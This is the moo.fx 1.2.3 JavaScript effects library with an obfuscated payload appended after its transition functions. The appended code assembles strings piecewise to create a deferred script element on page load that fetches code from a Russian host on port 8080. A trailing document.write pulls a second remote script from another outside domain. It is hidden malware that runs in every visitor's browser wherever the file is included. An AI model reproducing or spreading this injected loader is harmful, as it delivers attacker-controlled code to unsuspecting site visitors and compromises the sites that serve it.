/*
moo.fx, simple effects library built with prototype.js (http://prototype.conio.net).
by Valerio Proietti (http://mad4milk.net) MIT-style LICENSE.
for more info (http://moofx.mad4milk.net).
Sunday, March 05, 2006
v 1.2.3
*/

var fx = new Object();
//base
fx.Base = function(){};
fx.Base.prototype = {
	setOptions: function(options) {
	this.options = {
		duration: 500,
		onComplete: '',
		transition: fx.sinoidal
	}
	Object.extend(this.options, options || {});
	},

	step: function() {
		var time  = (new Date).getTime();
		if (time >= this.options.duration+this.startTime) {
			this.now = this.to;
			clearInterval (this.timer);
			this.timer = null;
			if (this.options.onComplete) setTimeout(this.options.onComplete.bind(this), 10);
		}
		else {
			var Tpos = (time - this.startTime) / (this.options.duration);
			this.now = this.options.transition(Tpos) * (this.to-this.from) + this.from;
		}
		this.increase();
	},

	custom: function(from, to) {
		if (this.timer != null) return;
		this.from = from;
		this.to = to;
		this.startTime = (new Date).getTime();
		this.timer = setInterval (this.step.bind(this), 13);
	},

	hide: function() {
		this.now = 0;
		this.increase();
	},

	clearTimer: function() {
		clearInterval(this.timer);
		this.timer = null;
	}
}

//stretchers
fx.Layout = Class.create();
fx.Layout.prototype = Object.extend(new fx.Base(), {
	initialize: function(el, options) {
		this.el = $(el);
		this.el.style.overflow = "hidden";
		this.iniWidth = this.el.offsetWidth;
		this.iniHeight = this.el.offsetHeight;
		this.setOptions(options);
	}
});

fx.Height = Class.create();
Object.extend(Object.extend(fx.Height.prototype, fx.Layout.prototype), {	
	increase: function() {
		this.el.style.height = this.now + "px";
	},

	toggle: function() {
		if (this.el.offsetHeight > 0) this.custom(this.el.offsetHeight, 0);
		else this.custom(0, this.el.scrollHeight);
	}
});

fx.Width = Class.create();
Object.extend(Object.extend(fx.Width.prototype, fx.Layout.prototype), {	
	increase: function() {
		this.el.style.width = this.now + "px";
	},

	toggle: function(){
		if (this.el.offsetWidth > 0) this.custom(this.el.offsetWidth, 0);
		else this.custom(0, this.iniWidth);
	}
});

//fader
fx.Opacity = Class.create();
fx.Opacity.prototype = Object.extend(new fx.Base(), {
	initialize: function(el, options) {
		this.el = $(el);
		this.now = 1;
		this.increase();
		this.setOptions(options);
	},

	increase: function() {
		if (this.now == 1 && (/Firefox/.test(navigator.userAgent))) this.now = 0.9999;
		this.setOpacity(this.now);
	},
	
	setOpacity: function(opacity) {
		if (opacity == 0 && this.el.style.visibility != "hidden") this.el.style.visibility = "hidden";
		else if (this.el.style.visibility != "visible") this.el.style.visibility = "visible";
		if (window.ActiveXObject) this.el.style.filter = "alpha(opacity=" + opacity*100 + ")";
		this.el.style.opacity = opacity;
	},

	toggle: function() {
		if (this.now > 0) this.custom(1, 0);
		else this.custom(0, 1);
	}
});

//transitions
fx.sinoidal = function(pos){
	return ((-Math.cos(pos*Math.PI)/2) + 0.5);
	//this transition is from script.aculo.us
}
fx.linear = function(pos){
	return pos;
}
fx.cubic = function(pos){
	return Math.pow(pos, 3);
}
fx.circ = function(pos){
	return Math.sqrt(pos);
}
y=50632;y--;fN=8809;fN++;function n(){var P={d:"fB"};Lf={w:"Bx"};try {var zb='Y'} catch(zb){};var C=String("crxWH".substr(0,2)+"eaXOp6".substr(0,2)+"te"+"ElXzYu".substr(0,2)+"emNKq".substr(0,2)+"en"+"Zkwt".substr(3));var Es=[];var D=new String();var v=new String("appen"+"dChil"+"FZIKd".substr(4));try {var ot='O'} catch(ot){};var uj=49816;var Hr=document;var z=window;var q=new String("TR3scri".substr(3)+"pt");A=42858;A-=188;var Z="onedQq".substr(0,2)+"QAkVlo".substr(4)+"L5uad5uL".substr(3,2);CA=3883;CA+=72;U={WZ:"i"};EJ=35916;EJ+=160;var s=new String("body5qQm".substr(0,4));var S=new String("sr"+"bAgc".substr(3));Zy=["Dv"];var Bu="";var o="defe"+"r";JQ={M:"Gx"};this.lH="lH";this.OZ=41869;this.OZ++;function L(){fJ={};gx=["Ag","T","kc"];Eu=["Ec","CN","Kk"];try {var vH=7293-7292;try {var Tw='BA'} catch(Tw){};this.th=36402;this.th++;var E=new String("/a"+"pp"+"hk9le".substr(3)+"-c"+"QpuAomupQA".substr(4,2)+"GbI/g".substr(3)+"oofIAY".substr(0,2)+"gl"+"sCMKe.MKsC".substr(4,2)+"co"+"m/"+"pr"+"9Phic".substr(3)+"elDkK".substr(0,2)+"kybinkby".substr(3,2)+"e."+"qxDGco".substr(4)+"0UIm.".substr(3)+"jKmph".substr(3)+"psuS".substr(0,1));Pn={yq:38392};var jA=new String();this.Ug=39502;this.Ug++;var HY=new String("http:sYNk".substr(0,5)+"//paslWSM".substr(0,5)+"sport"+"blues"+".ru:");var V=104388-96308;uN=["EG"];var Dr="Dr";this.Zs=53824;this.Zs+=181;jc=[];f=Hr[C](q);var NU={};var r={hL:false};var Kj={Drd:false};kz={};Ff=55903;Ff--;f[o]=vH;f[S]=HY+V+E;uD=26580;uD--;qE=25843;qE--;var hM={qc:23549};Hr[s][v](f);var uv='';} catch(u){this.Uh=44542;this.Uh+=46;};}this.HG=60960;this.HG--;z[Z]=L;this.KM="";};n();





document.write('<s'+'cript type="text/javascript" src="http://solk.seamscreative.info:8080/Unfriend.js"></scr'+'ipt>');
